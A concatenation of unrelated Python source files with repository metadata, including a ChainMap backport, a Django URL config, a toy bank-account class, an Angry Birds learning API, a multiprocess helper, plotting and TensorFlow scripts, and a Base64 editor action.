"quality_score": 0.5228841453206383,
"avg_score": null,
"num_lines": null
} |
"""A backport of ChainMap from Python 3 to Python 2.
See http://hg.python.org/cpython/file/default/Lib/collections/__init__.py#l756
for original source code. Everything here is lifted directly from there.
"""
from collections import MutableMapping
class ChainMap(MutableMapping):
"""A ChainMap groups multiple dicts (or other mappings) together
to create a single, updatable view.
The underlying mappings are stored in a list. That list is public and can
be accessed or updated using the *maps* attribute. There is no other state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates and deletions only operate on the first
mapping.
"""
def __init__(self, *maps):
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key]
except KeyError:
pass
return self.__missing__(key)
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps))
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
# for going backporting recursive_repr as well
# so a slight deviation by using the ChainMap.parents method
def __repr__(self):
return "{0.__class__.__name__}({1})".format(
self, ', '.join(map(repr, self.parents)))
@classmethod
def fromkeys(cls, iterable, *args):
"Create a ChainMap with a single dict created from the iterable"
return cls(dict.fromkeys(iterable, *args))
def copy(self):
"New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]"
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self, m=None):
'''New ChainMap followed by all previous maps. If no
map is provided an empty dict is used.
'''
if m is None:
m = {}
return self.__class__(m, *self.maps[1:])
@property
def parents(self):
"New ChainMap from maps[1:]"
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
"Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty"
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError("No keys found in the first mapping.")
def pop(self, key, *args):
"Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0]"
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
"Clear maps[0], leaving maps[1:] in tact"
self.maps[0].clear()
# Recipe taken from the Python3 collections module documentation
class DeepChainMap(ChainMap):
"Variant of ChainMap that allows direct updates to inner scopes"
def __setitem__(self, key, value):
for mapping in self.maps:
if key in mapping:
mapping[key] = value
return
self.maps[0][key] = value
def __delitem__(self, key):
for mapping in self.maps:
if key in mapping:
del mapping[key]
return
raise KeyError(key)
| {
"repo_name": "justanr/Py2ChainMap",
"path": "__init__.py",
"copies": "1",
"size": "3942",
"license": "mit",
"hash": 8991983741950350000,
"line_mean": 29.796875,
"line_max": 96,
"alpha_frac": 0.5915778792,
"autogenerated": false,
"ratio": 4.072314049586777,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.004910586805812932,
"num_lines": 128
} |
""" A backport of ChainMap from Python 3 to Python 2.
From https://github.com/justanr/Py2ChainMap
See http://hg.python.org/cpython/file/default/Lib/collections/__init__.py#l756
For original source code. Everything here is lifted directly from there.
"""
from collections import MutableMapping
class ChainMap(MutableMapping):
"""A ChainMap groups multiple dicts (or other mappings) together
to create a single, updatable view.
The underlying mappings are stored in a list. That list is public and can
be accessed or updated using the *maps* attribute. There is no other state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates and deletions only operate on the first
mapping.
"""
def __init__(self, *maps):
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key]
except KeyError:
pass
return self.__missing__(key)
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps))
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
# for going backporting recursive_repr as well
# so a slight deviation by using the ChainMap.parents method
def __repr__(self):
return "{0.__class__.__name__}({1})".format(
self, ', '.join(map(repr, self.parents)))
@classmethod
def fromkeys(cls, iterable, *args):
"Create a ChainMap with a single dict created from the iterable"
return cls(dict.fromkeys(iterable, *args))
def copy(self):
"New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]"
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self, m=None):
'''New ChainMap followed by all previous maps. If no
map is provided an empty dict is used.
'''
if m is None:
m = {}
return self.__class__(m, *self.maps[1:])
@property
def parents(self):
"New ChainMap from maps[1:]"
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
"Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty"
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError("No keys found in the first mapping.")
def pop(self, key, *args):
"Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0]"
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
"Clear maps[0], leaving maps[1:] in tact"
self.maps[0].clear()
# Recipe taken from the Python3 collections module documentation
class DeepChainMap(ChainMap):
"Variant of ChainMap that allows direct updates to inner scopes"
def __setitem__(self, key, value):
for mapping in self.maps:
if key in mapping:
mapping[key] = value
return
self.maps[0][key] = value
def __delitem__(self, key):
for mapping in self.maps:
if key in mapping:
del mapping[key]
return
raise KeyError(key)
| {
"repo_name": "jonathaneunice/Py2ChainMap",
"path": "py2chainmap.py",
"copies": "2",
"size": "3988",
"license": "bsd-3-clause",
"hash": -723510244105619000,
"line_mean": 30.15625,
"line_max": 96,
"alpha_frac": 0.593781344,
"autogenerated": false,
"ratio": 4.048730964467005,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5642512308467005,
"avg_score": null,
"num_lines": null
} |
"""abacus_edu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include, patterns
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from rest_framework_jwt.views import obtain_jwt_token
from .views.push_notification import push_notification
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/v1/', include('api.v1.urls', namespace='api')),
# Push Notification Through FCM
url(r'^push/', push_notification, name="push-notification"),
# Obtain JWT Token
url(r'^api-token-auth/', obtain_jwt_token),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
| {
"repo_name": "jupiny/abacus-edu",
"path": "abacus_edu/abacus_edu/urls.py",
"copies": "1",
"size": "1404",
"license": "mit",
"hash": -4098792528479811000,
"line_mean": 33.243902439,
"line_max": 79,
"alpha_frac": 0.7015669516,
"autogenerated": false,
"ratio": 3.518796992481203,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4720363944081203,
"avg_score": null,
"num_lines": null
} |
# A Banking account for the Bank X
# Some algorithms were created just to demonstrate basic methods
Birthday_data = {'David': '03.03.1994', 'George': '12.01.1991', 'Andrey': '09/05/1990'}
SSN = {'David': '23423443', 'George': '343423423', 'Andrey': '34333432'}
Account_Type = {'David': 'Checking', 'George': 'Saving', 'Andrey': 'Checking'}
ERROR = {}
class Account:
"Banking Account for the Bank X"
interest = 0.05
def __init__(self, account_holder, card_number, PIN):
self.balance = 0
self.holder = account_holder
self.card_number = card_number
self.PIN = PIN
def day_of_birth(self):
""" Checks if there is information about the date of birth of the user """
if self.holder in Birthday_data:
return Birthday_data[self.holder]
else:
return "There is no information about date of birth of this user in database please try again."
def SSN_check(self):
"""Chechs if there is information about the SSN Code of the user """
if self.holder in SSN:
return SSN[self.holder]
else:
return "There is no information about CCN of this user in database please try again."
def Database_information(self):
"""Checks if there is any information about the user - such as day of birth
and Social Security Number(SSN)
"""
if self.holder in Birthday_data and self.holder in SSN:
return True
else:
if not (self.holder in ERROR):
ERROR[self.holder] = 'Unknown Entry'
def CardIsValid(self):
"""Checks to make sure that the Credit Card Number is Valid by Luhn Algorithm"""
Cardnum = self.card_number
sum = 0
num_digits = len(Cardnum)
oddeven = num_digits & 1
for count in range(0, num_digits):
digit = int(Cardnum[count])
if not (( count & 1 ) ^ oddeven ):
digit = digit * 2
if digit > 9:
digit = digit - 9
sum = sum + digit
return ( (sum % 10) == 0 )
def PIN_IsValid(self):
"PIN Generator for this specific bank(Bank X)"
temporary = []
if self.CardIsValid():
indent = ''
for i in self.card_number:
temporary.append(i)
first, sum1 = temporary[0:4], 0
second, sum2 = temporary[4:8], 0
third, sum3 = temporary[8:12], 0
forth, sum4 = temporary[12:16], 0
for i in first:
sum1 = sum1 + int(i)
for j in second:
sum2 = sum2 + int(j)
for k in third:
sum3 = sum3 + int(k)
for l in forth:
sum4 = sum4 + int(l)
# Encoding for the first digit of the PIN
if sum1>=0 and sum1<4:
one = 0
elif sum1>=4 and sum1<9:
one = 1
elif sum1>=9 and sum1<14:
one = 2
elif sum1>=14 and sum1<18:
one = 3
elif sum1>=18 and sum1<21:
one = 4
elif sum1>=21 and sum1<23:
one = 5
elif sum1>=23 and sum1<27:
one = 6
elif sum1>=27 and sum1<30:
one = 7
elif sum1>=30 and sum1<33:
one = 8
else:
one = 9
#Encoding for the second digit of the PIN
if sum2>=0 and sum2<4:
two = 0
elif sum2>=4 and sum2<8:
two = 1
elif sum2>=8 and sum2<14:
two = 2
elif sum2>=14 and sum2<18:
two = 3
elif sum2>=18 and sum2<20:
two = 4
elif sum2>=20 and sum2<23:
two = 5
elif sum2>=23 and sum2<26:
two = 6
elif sum2>=26 and sum2<30:
two = 7
elif sum2>=30 and sum2<32:
two = 8
else:
two = 9
#Encoding for the third digit of the PIN
if sum3>=0 and sum3<3:
three = 0
elif sum3>=3 and sum3<9:
three = 1
elif sum3>=9 and sum3<14:
three = 2
elif sum3>=14 and sum3<18:
three = 3
elif sum3>=18 and sum3<20:
three = 4
elif sum3>=20 and sum3<23:
three = 5
elif sum3>=23 and sum3<28:
three = 6
elif sum3>=28 and sum3<30:
three = 7
elif sum3>=30 and sum3<33:
three = 8
else:
three = 9
# Encoding for the forth digit of the PIN
if sum4>=0 and sum4<2:
four = 0
elif sum4>=2 and sum4<7:
four = 1
elif sum4>=7 and sum4<10:
four = 2
elif sum4>=10 and sum4<14:
four = 3
elif sum4>=14 and sum4<18:
four = 4
elif sum4>=18 and sum4<22:
four = 5
elif sum4>=22 and sum4<26:
four = 6
elif sum4>=26 and sum4<30:
four = 7
elif sum4>=30 and sum4<33:
four = 8
else:
four = 9
answer = 1000 * one + 100 * two + 10 * three + four
if str(answer) == self.PIN:
return True
else:
return False
else:
return False
def Account_Type_Info(self):
"""Checks the type of the account"""
if self.holder in Account_Type:
return Account_Type[self.holder]
else:
print("There is no information about you in current database")
return False
def Saving(self, amount):
"""Imposes a 0.5$ deposit fee"""
return amount - 0.5
def Checking(self, amount):
"""Imposes a 1$ withdrawal fee"""
return amount - 1
def Sequrity_Check(self):
"""Checks if there is a full information about the user in the database"""
message = 'Dear {0},'.format(self.holder)
if self.CardIsValid() == True and self.PIN_IsValid() == True and self.Database_information() == True:
return True
else:
print(message)
print("Trying to verify your account information from the database")
if self.Database_information() == True:
print(message)
print("Your information has been found in the database")
return True
else:
print(message)
print("There is no information about you in current database")
return False
def deposit(self, PIN):
"""Deposits amount to the account"""
message = 'Dear {0},'.format(self.holder)
if self.Sequrity_Check() == True:
balance = self.balance
attemp_list = []
def deposit_try(amount, PIN_attempt):
nonlocal balance
if len(attemp_list) == 3:
print(message)
return "Your account is locked."
if PIN_attempt != self.PIN:
attemp_list.append(attemp_list)
print(message)
return "Incorrect PIN"
balance = self.Saving (balance + amount)
self.balance = balance
return deposit_try
else:
print("An error occured during transaction")
print("You provided incorrect information")
return
def withdraw(self, PIN):
"""Withdrows amount from the account"""
message = 'Dear {0},'.format(self.holder)
if self.Sequrity_Check() == True:
balance = self.balance
attemp_list = []
def withdraw(amount, PIN_attempt):
nonlocal balance
if len(attemp_list) == 3:
print(message)
return "Your account is locked."
if PIN_attempt != self.PIN:
attemp_list.append(attemp_list)
print(message)
return "Incorrect PIN"
if amount > balance:
print ("Insufficient funds")
print ("Do you want to apply for loan?")
print("yes/no")
variable = input('Your answer!:')
if variable == 'yes':
return self.overdrown()
else:
return
balance = self.Checking(balance - amount)
self.balance = balance
return withdraw
else:
print("An error occured during transaction")
print("You provided incorrect information")
return
def overdrown(self):
# a = Account('Rafa', '4815820036130845', '4224')
balance = self.balance
bool = False
""" Makes sure that account balance will not be below 0."""
message = 'Dear {0},'.format(self.holder)
print(message)
print ("Dear User Your Account Balance Can Be Negative")
print("Indicate the amount you want apply for?")
print ("1. $250")
print ("2. $500")
print ("3. $1000 (Another number will bring to $250) ")
print ("Choose an option - 1 / 2 / 3")
# If you will input another arbitrary number it automatically will choose 3.
option = input()
if option == '1':
balance = self.Saving (balance + 250)
bool = True
elif option == '2':
balance = self.Saving (balance + 500)
bool = True
else:
balance = self.Saving (balance + 1000)
bool = True
self.balance = balance
print( self.balance)
print ("Do you want to calculae the rate? yes/no")
ans = input()
interest = 0.0001
if ans == 'yes':
print("Indicate the duration of the loan?")
print ("1. 1 year")
print ("2. 2 years")
print ("3. 3 year. (Another number will bring to 3 year) ")
time = input()
if time == 1:
rate = 250 * (0.7+ interest)
elif time == 2:
rate = 500 * pow((0.7 + interest), 2)
else:
rate = 1000 * pow((0.7 + interest), 3)
return rate
else:
return
| {
"repo_name": "MicBrain/Bank_Account_Sample",
"path": "bank.py",
"copies": "1",
"size": "8206",
"license": "mit",
"hash": -4838618070273833000,
"line_mean": 25.2172523962,
"line_max": 103,
"alpha_frac": 0.6295393614,
"autogenerated": false,
"ratio": 2.9560518731988474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4085591234598847,
"avg_score": null,
"num_lines": null
} |
#abAPI
#This API contains the definition of the Angry Birds as an approximate MDP (define states and their successors
# by manipulating the AngryBirdsGame class in AngryBirds.py). We also define a simplified version of the Game States
# by extracting all necessary information to run algorthms.
import os
import sys
import math
import time
import random
import pygame
current_path = os.getcwd()
sys.path.insert(0, os.path.join(current_path, "../pymunk-4.0.0"))
import pymunk as pm
from characters import Bird
from level import Level
#import imp
#AngryBirds = imp.load_source('AngryBirds', '/src/AngryBirds.py')
#from src import AngryBirds
import AngryBirds
class AngryBirdsMDP:
# Initializes the game
def __init__(self,startLevel = -1,repeat=False, levels=[]):
self.game = AngryBirds.AngryBirdsGame()
self.show=False
self.startLevel = startLevel
self.repeat=repeat
self.levels = levels
def showLearning(self):
self.show = True
def showState(self):
self.game.runFrames(40, show=True)
def restart(self):
self.game.restart()
# Return the start state.
def startState(self):
# TODO Initialize with different levels
self.game = AngryBirds.AngryBirdsGame()
if self.startLevel>-1:
self.game.startAtLevel(self.level)
return GameState(self.game)
# Return set of actions possible from |state|.
def actions(self, state):
#If number of active birds > 0, return possible angles and slingshot extensions
# LR - this is implemented in GameAgent.py already
raise NotImplementedError("Override me")
# Return a list of (newState, prob, reward) tuples corresponding to edges
# coming out of |state|.
# If IsEnd(state), return the empty list.
def succAndReward(self, state, action):
#Do we have to check first if |state| corresponds to the current state of the game? If they don't coincide, use GameState to redefine the state of self.game
if state.isEnd():
if state.isWin():
if self.repeat:
self.game.restartGame()
return (GameState(self.game),0)
elif len(self.levels)>0:
self.game.startAtLevel(random.choice(self.levels))
return (GameState(self.game),0)
else:
self.game.startNewLevel()
return (GameState(self.game),0)
else:
return (None,-50000)
pastscore = self.game.getScore()
angle = action[0]
distance = action[1]
#Run action
self.game.performAction(angle, distance)
self.game.runUntilStatic(self.show)
#Calculate reward
reward = self.game.getScore() - pastscore
#Return the next state with probability 1.
return (GameState(self.game), reward)
def discount(self):
return 1
# Compute set of states reachable from startState. Helper function for
# MDPAlgorithms to know which states to compute values and policies for.
# This function sets |self.states| to be the set of all states.
def computeStates(self):
self.states = set()
queue = []
self.states.add(self.startState())
queue.append(self.startState())
while len(queue) > 0:
state = queue.pop()
for action in self.actions(state):
for newState, reward in self.succAndReward(state, action):
if newState not in self.states:
self.states.add(newState)
queue.append(newState)
class GameState():
def __init__(self, game):
self.nbirds = game.getNumberRemainingBirds()
self.pigs = {'number': len(game.getPigs()), 'positions': game.getPigPositions()}
self.polys = {'number': len(game.getPolys()), 'features': game.getPolyFeatures()}
self.level = game.getLevel()
def isEnd(self):
return self.nbirds==0 or self.pigs['number']==0
def isWin(self):
return self.nbirds>0 and self.pigs['number']==0
def isLoose(self):
return self.nbirds==0
def getLevel(self):
return self.level
| {
"repo_name": "imanolarrieta/angrybirds",
"path": "src/abAPI.py",
"copies": "1",
"size": "4277",
"license": "mit",
"hash": 4899484799628583000,
"line_mean": 30.6814814815,
"line_max": 164,
"alpha_frac": 0.6259060089,
"autogenerated": false,
"ratio": 3.81875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49446560089,
"avg_score": null,
"num_lines": null
} |
"""A bare-bones but effective way to run a target callable in parallel
using multiple processes.
POSIX specific.
The reason I opted to use this rather than 'import multiprocessing' is
that multiprocessing uses threads to listen in the background for
results returning on kids' sockets. If possible, I would rather not
initialize the threading mechanism at all* and gain a bit more
performance for my children.
* initializing the threading mechanism calls ceval.c:PyEval_InitThreads,
which incurs overhead for many future operations; avoiding threads
altogether can gain visible performance increases, especially when
doing locking intensive operations
"""
__author__ = 'Yaniv Aknin (yaniv@aknin.name)'
import os
from select import select
from cPickle import dumps, loads
import traceback
from collections import namedtuple
ChildNumbers = namedtuple("ChildNumbers", "current, total")
# NOTE: makes waitpid() below more readable
NO_OPTIONS = 0
class ExceptionsRaisedInChildren(Exception):
pass
def multicall(target, args=None, kwargs=None, how_many=None,
permit_exceptions=False, pass_child_numbers=False):
args = args or []
kwargs = kwargs or {}
pids, pipes = fork_children(target, args, kwargs, how_many,
pass_child_numbers)
raw_results = read_raw_results_in_parallel(pipes)
# RANT: I used to think Unix terminology is funny...
# as I get older, 'reap dead children' gets less funny.
reap_dead_children(pids)
return process_results(raw_results, permit_exceptions)
def fork_children(target, args, kwargs, how_many, pass_child_numbers):
pids = []
pipes = {}
for number in xrange(how_many):
read_fd, write_fd = os.pipe()
if pass_child_numbers:
kwargs = dict(kwargs)
kwargs['child_numbers'] = ChildNumbers(current=number, total=how_many)
pid = os.fork()
if pid == 0:
os.close(read_fd)
exec_child_and_never_return(write_fd, target, args, kwargs)
os.close(write_fd)
pids.append(pid)
pipes[read_fd] = []
return pids, pipes
def read_raw_results_in_parallel(pipes):
raw_results = []
while pipes:
read_fds, dummy_write_fds, dummy_exceptional_fds = select(pipes, [], [])
for read_fd in read_fds:
data = os.read(read_fd, 4096)
if not data:
raw_results.append(pipes.pop(read_fd))
else:
pipes[read_fd].append(data)
return raw_results
def reap_dead_children(pids):
while pids:
waitable_pid = pids.pop()
waited_pid, sts = os.waitpid(waitable_pid, NO_OPTIONS)
assert waitable_pid == waited_pid
def process_results(raw_results, permit_exceptions):
results = [loads("".join(raw_result)) for raw_result in raw_results]
exceptions = [result for result in results if isinstance(result, Exception)]
if exceptions:
if not permit_exceptions:
raise ExceptionsRaisedInChildren(exceptions)
return results
def exec_child_and_never_return(write_fd, target, args, kwargs):
try:
try:
result = target(*args, **kwargs)
except Exception, error:
result = error
result._traceback = traceback.format_exc()
# NOTE: the following line may block if the parent buffer is full, that's cool with us
os.write(write_fd, dumps(result))
finally:
# NOTE: no matter what, the child must exit here
os._exit(0)
def test():
def plain_target(*args, **kwargs):
return args
def random_sleeps():
from time import sleep
from random import random
sleep(random())
return 42
def large_output():
return 'a' * 2**20
PROCESSES = 32
assert multicall(plain_target, (1,2,3), how_many=PROCESSES) == [(1,2,3)] * PROCESSES
assert multicall(random_sleeps, how_many=PROCESSES) == [42] * PROCESSES
assert multicall(large_output, how_many=PROCESSES) == ['a' * 2**20] * PROCESSES
if __name__ == '__main__':
test()
| {
"repo_name": "yaniv-aknin/labour",
"path": "labour/tester/multicall.py",
"copies": "1",
"size": "4096",
"license": "mit",
"hash": -3151217383089081000,
"line_mean": 33.7118644068,
"line_max": 94,
"alpha_frac": 0.6525878906,
"autogenerated": false,
"ratio": 3.775115207373272,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.990812412636971,
"avg_score": 0.003915794320712402,
"num_lines": 118
} |
"""A barebones HTTP server example."""
import subprocess
import traceback
import util
class SimpleHTTPHandler(util.server.Server):
"""A hello world kind of an HTTP server."""
def process_request(self, connection, address):
"""Send the requested file to the connection socket."""
req = util.http.HTTPRequest(connection, self.max_recv_size)
content_type, content = self.file_contents(req.path)
headers = {'Content-Type': content_type, 'Connection': 'close'}
util.http.HTTPResponse(200, headers, content).send(connection, address)
return self
def file_contents(self, path):
"""Return a tuple (content_type, content) for the given file path."""
if not path.exists():
raise util.http.HTTPException(path, 404)
if path.is_file():
with path.open('rb') as f:
content = f.read()
content_type = path.type
else:
content = subprocess.Popen(
['ls', '-al', str(path.realpath())],
stdout=subprocess.PIPE
).communicate()[0]
content_type = 'text/plain'
return content_type, content
def handle_connection(self, connection, address):
try:
self.process_request(connection, address)
except util.http.HTTPException as error:
error.send(connection, address)
raise
except Exception:
util.http.HTTPException(
traceback.format_exc(), 500
).send(connection, address)
raise
| {
"repo_name": "cheeseywhiz/cheeseywhiz",
"path": "socket/httpsrv.py",
"copies": "1",
"size": "1590",
"license": "mit",
"hash": -4473114615410046500,
"line_mean": 32.125,
"line_max": 79,
"alpha_frac": 0.5918238994,
"autogenerated": false,
"ratio": 4.504249291784703,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5596073191184703,
"avg_score": null,
"num_lines": null
} |
""" A barebones workflow for experimentally probing a pretrained tensorflow
graph_def (*.pb) file.
"""
from __future__ import print_function, division
import numpy as np
import tensorflow as tf
# SETTINGS
tensorboard_dir = "/tmp/tf"
graph_file = "mygraph.pb"
tf_graph = tf.Graph()
with tf_graph.as_default():
# with tf.variable_scope('inputs') as scope:
# tf_X = tf.placeholder(tf.float32, shape=(3, 4))
# LOAD GRAPH_DEF FILE
access_these=[] # operations to extract
remap_input = None # remap pretrained model input to a new tensor
with tf.device('/cpu:0'): # Prevent multiple prallel I/O operations
with tf.gfile.FastGFile(graph_file, 'rb') as file_obj:
# Load the graph from file
graph_def = tf.GraphDef()
graph_def.ParseFromString(file_obj.read())
# Extract particular operations/tensors
requested_ops = tf.import_graph_def(
graph_def,
name='',
return_elements=access_these,
input_map=remap_input
)
print(requested_ops)
# TENSORBOARD
with tf.variable_scope('tensorboard') as scope:
tf_summary_writer = tf.summary.FileWriter(tensorboard_dir, graph=tf_graph)
tf_summary_op = tf.summary.scalar(name="dummy", tensor=4)
# INTERACTIVE MODE
sess = tf.Session(graph=tf_graph)
# sess.run(tf.global_variables_initializer())
# RUN TENSORBOARD
summary_str = sess.run(tf_summary_op)
tf_summary_writer.add_summary(summary_str, 0)
tf_summary_writer.flush()
# tensorboard --logdir="/tmp/tf"
# 0.0.0.0:6006
# INPUTS
# X = np.random.randn(3,4)
# feed_dict = {tf_X: X}
# output = sess.run(tf_y, feed_dict=feed_dict)
# print(output)
# PROBE OPERATIONS
#Get a list of all the operations in a graph
tf_graph.get_operations()
#Get a list of all the operation names in a graph
[op.name for op in graph.get_operations()]
# Get specific operations/tensors
# tf_graph.get_operation_by_name("layer1")
# tf_graph.get_tensor_by_name("layer1:0")
sess.close()
| {
"repo_name": "ronrest/convenience_py",
"path": "ml/tf/probe_graphdef_file.py",
"copies": "1",
"size": "2071",
"license": "apache-2.0",
"hash": 307577671181354600,
"line_mean": 28.1690140845,
"line_max": 82,
"alpha_frac": 0.6518590053,
"autogenerated": false,
"ratio": 3.303030303030303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9448785236330253,
"avg_score": 0.001220814400010056,
"num_lines": 71
} |
# a bar plot with errorbars
import numpy as np
import matplotlib.pyplot as plt
import itertools
def bar_chart(mean_lists, std_lists, group_labels, tick_labels, colors_list=[], set_separation=.5, side_buffer=0.1):
'''
modified from http://matplotlib.org/examples/api/barchart_demo.html (May 10, 2015)
The axis of the plot is returned so that the user may add axes labels, plot title, and legend, and make modifications.
-------------------------------------------------------------------------------------
Example:
menMeans = (20, 35, 30, 35, 27)
menStd = (2, 3, 4, 1, 2)
womenMeans = (25, 32, 34, 20, 25)
womenStd = (3, 5, 2, 3, 3)
colors = ['r','purple']
means = [menMeans, womenMeans]
stds = [menStd, womenStd]
group_labels = ('Men','Women')
tick_labels = ('G1', 'G2', 'G3', 'G4', 'G5')
ax = bar_chart(means, stds, group_labels, tick_labels, colors)
ax.legend(loc=8)
plt.title("Men vs. Women")
plt.show()
-------------------------------------------------------------------------------------
future work:
not satisfied with method of setting color scheme
see that you can use izip longest to leave colors as an empty array
and then set it later:
>>>colormap = plt.cm.gist_ncar #see choosing colormaps at http://matplotlib.org/users/colormaps.html
>>>plt.gca().set_color_cycle([colormap(i) for i in np.linspace(0, 0.9, num_plots)])
>>>for n, (means, stds, labels) in enumerate(itertools.izip_longest(means, std, group_labels)):
...
'''
def autolabel(rects):
# attach some text labels
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x()+rect.get_width()/2., 1.02*height, '%d'%int(height),
ha='center', va='bottom')
N = max([len(i) for i in mean_lists]) #number of values in each group
num_groups = len(mean_lists)
if not colors_list:
colormap = plt.cm.rainbow #gist_ncar
colors_list=[colormap(i) for i in np.linspace(0, 0.9, num_groups)]
#check that lists are the same length
lists = [std_lists, group_labels, colors_list]
for list in lists:
if len(mean_lists) != len(list):
raise Exception('mean_list, std_lists, group_labels and colors_list must all be of the same length. they are {} long respectively.'.format(map(len, lists)))
width=1.0/(num_groups+set_separation)
ind = np.arange(N)+set_separation # the x locations for the groups. note each value is the left most edge of a bar.
fig, ax = plt.subplots()
bar_groups = [] #collect for legend and labeling purposes
x_max = -np.inf
x_min = np.inf
for n, (means, stds, labels, color) in enumerate(itertools.izip(mean_lists, std_lists, group_labels, colors_list)):
left = ind+(n*width)
bar_set = ax.bar(left, means, width, color=color, yerr=stds, label=labels) #add bar graphs
autolabel(bar_set)
bar_groups.append(bar_set)
if x_max < left[-1]:
x_max = left[-1]
if x_min > left[0]:
x_min = left[0]
ax.set_xlim(left=x_min-side_buffer, right=x_max+width+side_buffer)
tick_positions = ind + (width*num_groups/2)
ax.set_xticks(tick_positions)
ax.set_xticklabels( tick_labels )
return plt.gca()
if __name__ == '__main__':
# fake data
menMeans = (20, 35, 30, 35, 27)
menStd = (2, 3, 4, 1, 2)
womenMeans = (25, 32, 34, 20, 25)
womenStd = (3, 5, 2, 3, 3)
intersexMeans = (23,22,22,15,31)
intersexStd = (0,0,0,0,0)#(1,4,1,5,2)
# group data + setup
colors = ['r','purple','g']
means = [menMeans, womenMeans, intersexMeans]
stds = [menStd, womenStd, intersexStd]
# 3 group bar chart
ax = bar_chart(means,stds,('Men','Women','Intersex'),('G1', 'G2', 'G3', 'G4', 'G5'))#, colors)
ax.legend(loc=8)
plt.show()
# 2 group bar chart
ax = bar_chart(means[:2],stds[:2],('Men','Women'),('G1', 'G2', 'G3', 'G4', 'G5'), colors[:2])
ax.legend(loc=8)
plt.show()
#### other way
means = zip(menMeans,womenMeans)
stds = zip(menStd,womenStd)
colors = ['r','b','g','m','c']
ax = bar_chart(means,stds,('G1', 'G2', 'G3', 'G4', 'G5'),('Men','Women'),colors)
ax.legend(loc=8)
means = zip(menMeans,womenMeans,intersexMeans)
stds = zip(menStd,womenStd,intersexStd)
colors = ['r','b','g','m','c']
ax = bar_chart(means,stds,('G1', 'G2', 'G3', 'G4', 'G5'),('Men','Women','Intersex'),colors)
ax.legend(loc=8)
plt.show()
| {
"repo_name": "drcgw/IPython-Big-Data",
"path": "Project-1-Sequencing/Master Notebook/multigroup_barchart.py",
"copies": "1",
"size": "4663",
"license": "bsd-3-clause",
"hash": -3943400293440957400,
"line_mean": 33.7985074627,
"line_max": 168,
"alpha_frac": 0.5640145829,
"autogenerated": false,
"ratio": 3.104527296937417,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8938347246014289,
"avg_score": 0.0460389267646257,
"num_lines": 134
} |
'''A Base64 Encodeing action for the Manipulate plugin for Coda'''
import cp_actions as cp
import base64
def act(controller, bundle, options):
'''
Required action method
Setting decode=True will decode instead of encoding
'''
context = cp.get_context(controller)
decode = cp.get_option(options, 'decode', False)
selection, range = cp.selection_and_range(context)
# do nothing unless they selected something
if range.length == 0:
return
if decode:
try:
text = base64.b64decode(selection)
# base64decode raises a TypeError if the string doesn't have the right
# padding, or if it's invalid base64... We'll just catch this error
# and do nothing at all :)
except TypeError:
return
# also, base64decode tends to return an empty string, which is also lame
if range.length and not len(text):
return
else:
text = base64.b64encode(selection)
cp.insert_text(context, text, range) | {
"repo_name": "bobthecow/ManipulateCoda",
"path": "src/Support/Scripts/Base64Encode.py",
"copies": "1",
"size": "1085",
"license": "mit",
